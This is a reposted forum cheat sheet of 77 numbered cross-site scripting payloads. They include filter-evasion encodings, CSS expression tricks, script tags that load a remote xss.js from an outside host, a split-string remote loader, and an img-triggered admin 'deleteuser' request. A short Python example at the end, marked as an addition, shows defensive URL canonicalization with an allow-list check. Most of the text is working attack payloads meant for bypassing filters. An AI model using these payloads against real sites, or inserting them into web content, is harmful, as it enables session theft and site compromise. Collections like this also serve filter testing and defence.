
XSS Attack Roundup: Something Those Working on Website Security Should Take Note Of

程序员文章站 2022-03-12 15:57:22
It seems there is rather little material about XSS on t00ls; I saw some good stuff and copied it over, not sure whether any of you need to bookmark it... 12-10-16...
(1) Plain XSS JavaScript injection
<script src=http://3w.org/xss/xss.js></script>
(2) img tag XSS using a JavaScript command
<script src=http://3w.org/xss/xss.js></script>
(3) img tag, no semicolon, no quotes
<img src=javascript:alert('xss')>
(4) img tag, case insensitive
<img src=javascript:alert('xss')>
(5) HTML encoding (semicolons required)
<img src=javascript:alert("xss")>
(6) Malformed img tag
<img """><script>alert("xss")</script>">
(7) fromCharCode (calculator)
<img src=javascript:alert(string.fromcharcode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<img src=jav..omitted..s')>
(9) 7-bit UTF-8 Unicode encoding, which has no semicolons (calculator)
<img src=jav..omitted..s')>
(10) Hex encoding, also without semicolons (calculator)
<img src=&#x6a&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting up javascript
<img src="jav ascript:alert('xss');">
(12) Embedded encoded tab, splitting up javascript
<img src="jav ascript:alert('xss');">
(13) Embedded newline
<img src="jav ascript:alert('xss');">
(14) Embedded carriage return
<img src="jav ascript:alert('xss');">
(15) Multiline injection of embedded javascript, an extreme XSS example
<img src="javascript:alert('xss')">
(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
(17) Null character
perl -e 'print "<img src=java\0script:alert(\"xss\")>";' > out
12-7-1 t00ls - powered by discuz! board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267
(18) Null character 2; null characters are basically ineffective in China, because there is nowhere to make use of them
perl -e 'print "<scr\0ipt>alert(\"xss\")</scr\0ipt>";' > out
(19) Spaces and meta characters before the javascript in an img tag
<img src=" javascript:alert('xss');">
(20) non-alpha-non-digit XSS
<script/xss src="http://3w.org/xss/xss.js"></script>
(21) non-alpha-non-digit XSS 2
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("xss")>
(22) non-alpha-non-digit XSS 3
<script/src="http://3w.org/xss/xss.js"></script>
(23) Double open brackets
<<script>alert("xss");//<</script>
(24) No closing script tag (Firefox and similar browsers only)
<script src=http://3w.org/xss/xss.js?<b>
(25) No closing script tag 2
<script src=//3w.org/xss/xss.js>
(26) Half-open HTML/JavaScript XSS
<img src="javascript:alert('xss')"
(27) Double open angle brackets
<iframe src=http://3w.org/xss.html <
(28) No single quotes, double quotes or semicolons
<script>a=/xss/
alert(a.source)</script>
(29) Escape-filtered JavaScript
\";alert('xss');//
(30) Closing the title tag
</title><script>alert("xss");</script>
(31) input image
<input src="javascript:alert('xss');">
(32) body image
<body background="javascript:alert('xss')">
(33) body tag
<body('xss')>
(34) img dynsrc
<img dynsrc="javascript:alert('xss')">
(35) img lowsrc
<img lowsrc="javascript:alert('xss')">
(36) bgsound
<bgsound src="javascript:alert('xss');">
(37) style sheet
<link rel="stylesheet" href="javascript:alert('xss');">
(38) Remote stylesheet
<link rel="stylesheet" href="http://3w.org/xss.css">
(39) list-style-image (list style)
<style>li {list-style-image: url("javascript:alert('xss')");}</style><ul><li>xss
(40) img vbscript
<img src='vbscript:msgbox("xss")'>
(41) meta with a linked URL
<meta http-equiv="refresh" content="0;
url=http://;url=javascript:alert('xss');">
(42) iframe
<iframe src="javascript:alert('xss');"></iframe>
(43) frame
<frameset><frame src="javascript:alert('xss');"></frameset>
(44) table
<table background="javascript:alert('xss')">
(45) td
<table><td background="javascript:alert('xss')">
(46) div background-image
<div style="background-image: url(javascript:alert('xss'))">
(47) div background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<div style="background-image: url(javascript:alert('xss'))">
(48) div expression
<div style="width: expression_r(alert('xss'));">
(49) style attribute with a split expression
<img style="xss:expression_r(alert('xss'))">
(50) Anonymous style (made up of an open angle bracket followed by a letter)
<xss style="xss:expression_r(alert('xss'))">
(51) style background-image
<style>.xss{background-image:url("javascript:alert('xss')");}</style><a class=xss></a>
(52) img style method
exppression(alert("xss"))'>
(53) style background
<style><style type="text/css">body{background:url("javascript:alert('xss')")}</style>
(54) base
<base href="javascript:alert('xss');//">
(55) embed tag: you can embed Flash that contains XSS
<embed src="http://3w.org/xss/xss.swf" ></embed>
(56) Using ActionScript in Flash, you can sneak your XSS code in
a="get";
b="url(\"";
c="javascript:";
d="alert('xss');\")";
eval_r(a+b+c+d);
(57) XML namespace; the .htc file must be on the same server as your XSS payload
<html xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/xss/xss.htc">
<xss:xss>xss</xss:xss>
</html>
(58) If your JS is filtered, you can add JS code inside an image to exploit it
<script src=""></script>
(59) img embedded commands, can execute arbitrary commands
<img src="http://www.xxx.com/a.php?a=b">
(60) img embedded commands (a.jpg on the same server)
redirect 302 /a.jpg http://www.xxx.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<script a=">" src="http://3w.org/xss.js"></script>
(62)
<script =">" src="http://3w.org/xss.js"></script>
(63)
<script a=">" " src="http://3w.org/xss.js"></script>
(64)
<script "a='>'" src="http://3w.org/xss.js"></script>
(65)
<script a=`>` src="http://3w.org/xss.js"></script>
(66)
<script a=">'>" src="http://3w.org/xss.js"></script>
(67)
<script>document.write("<scri");</script>pt src="http://3w.org/xss.js"></script>
(68) URL bypass
<a href="http://127.0.0.1/">xss</a>
(69) URL encoding
<a href="http://3w.org">xss</a>
(70) IP in decimal
<a href="http://3232235521'>xss</a>
(71) IP in hex
<a href="http://0xc0.0xa8.0x00.0x01'>xss</a>
(72) IP in octal
<a href="http://0300.0250.0000.0001'>xss</a>
(73) Mixed encoding
<a href="h
tt p://6 6.000146.0x7.147/"">xss</a>
(74) Omitting [http:]
<a href="//www.google.com/">xss</a>
(75) Omitting [www]
<a href="http://google.com/">xss</a>
(76) Absolute DNS with a trailing dot
<a href="http://www.google.com./">xss</a>
(77) javascript link
<a href="javascript:document.location='http://www.google.com/'">xss</a>
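As an added defender-side example (not code from the original post): the canonicalization a URL-attribute filter has to perform before it inspects the scheme, since vectors (3) to (19), (40) and (77) above hide javascript: or vbscript: behind mixed case, embedded control characters, NUL bytes, leading spaces and entities with or without semicolons. An allow-list check on the canonical form is shown beside the naive blocklist these vectors defeat; the sample inputs are constructed here and modelled on the numbered vectors, and ALLOWED_SCHEMES is an assumption about what a site needs to permit.

```python
import html
import re

# Added example (not from the original post): canonicalize a URL attribute
# the way a browser does, then check its scheme against an allow-list.
_CONTROL_RE = re.compile(r"[\x00-\x20]")  # C0 controls and space, which browsers drop
_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):")
ALLOWED_SCHEMES = {"http", "https", "mailto"}  # assumed site policy; allow-list, not blocklist


def canonicalize_url(value: str) -> str:
    """Entities decoded (with or without ';'), controls removed, case folded."""
    decoded = html.unescape(html.unescape(value))  # twice: catches double encoding
    return _CONTROL_RE.sub("", decoded).casefold()


def is_safe_url(value: str) -> bool:
    """Allow-list check on the canonical form; relative URLs have no scheme and pass."""
    match = _SCHEME_RE.match(canonicalize_url(value))
    return match is None or match.group(1) in ALLOWED_SCHEMES


def naive_is_safe(value: str) -> bool:
    """Blocklist check of the kind the vectors above are built to slip past."""
    return "javascript:" not in value.lower()


# Constructed samples modelled on vectors in this post, with the correct verdict.
SAMPLES = [
    ("javascript:alert('xss')", False),          # (3) plain
    ("JaVaScRiPt:alert('xss')", False),          # (4) mixed case
    ("jav\tascript:alert('xss')", False),        # (11) embedded tab
    ("jav\r\nascript:alert('xss')", False),      # (13)/(14) newline and carriage return
    ("java\x00script:alert('xss')", False),      # (17) NUL byte
    ("   javascript:alert('xss')", False),       # (19) leading spaces
    ("&#x6a&#x61vascript:alert('xss')", False),  # (10) hex entities without semicolons
    ("vbscript:msgbox('xss')", False),           # (40) another active scheme
    ("http://example.com/page", True),
    ("/images/logo.png", True),
    ("mailto:admin@example.com", True),
]


def misclassified(check) -> list:
    """Samples on which `check` returns the wrong verdict."""
    return [value for value, safe in SAMPLES if check(value) != safe]
```

Current browsers no longer execute javascript: URLs in img src or CSS url(), but the same canonicalization is needed for href and for any value a filter inspects before rendering.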